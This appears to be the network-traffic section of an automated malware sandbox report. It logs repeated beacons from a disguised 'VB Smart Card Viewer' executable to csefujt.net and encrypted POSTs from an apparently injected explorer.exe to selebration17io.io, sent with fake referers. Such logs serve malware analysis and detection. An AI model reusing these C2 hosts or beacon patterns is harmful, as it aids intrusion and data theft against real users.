                                                                                                                                                                                                                                                                                                                                                                33192.168.2.649770185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:51.529531002 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:51.765952110 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                34192.168.2.649771185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:52.097227097 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:52.339392900 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                35192.168.2.649772185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:52.684153080 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:52.921152115 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                36192.168.2.649774185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:53.267543077 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:53.509623051 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                37192.168.2.649775185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:54.142329931 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:54.387175083 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                38192.168.2.649776185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:55.374383926 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:55.615428925 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:55 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                39192.168.2.649777185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:55.982300997 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:56.230501890 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:56 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                40192.168.2.649778185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:56.576025963 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:56.812817097 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:56 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                41192.168.2.64977991.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:56.957969904 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://yasjbpuumvei.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 112
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:56.958000898 CET112OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 82 dc 32 e1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO2n>$U8&C#]-
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:57.214735985 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:57 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                42192.168.2.649780185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:57.254271984 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:57.496530056 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:57 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                43192.168.2.64978191.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:57.681674004 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://jblcvnhdfmo.com/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 224
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:57.681704998 CET224OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ff a0 39 a3
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO9""F0efN'5)aWn=]0+M:i2xx5!896k~?4|ENh[>j-F&y&If./96i
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:57.938400030 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:57 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                44192.168.2.649782185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:57.873055935 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:58.118633986 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                45192.168.2.649783185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:58.471899033 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:58.708695889 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                46192.168.2.64978491.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:59.004014969 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://fisqpaapeirybum.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 333
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:59.004050016 CET333OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 b1 b5 5f bd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO_ro0G-8fk?z!&0eU"7\ur1-U)\!@&\.Z]@$a"><)<WsNJVoLKHknPuPo
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:59.256357908 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:59 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                47192.168.2.649785185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:59.061580896 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:59.304462910 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:59 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                48192.168.2.649786185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:59.703879118 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:59.940912008 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:59 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
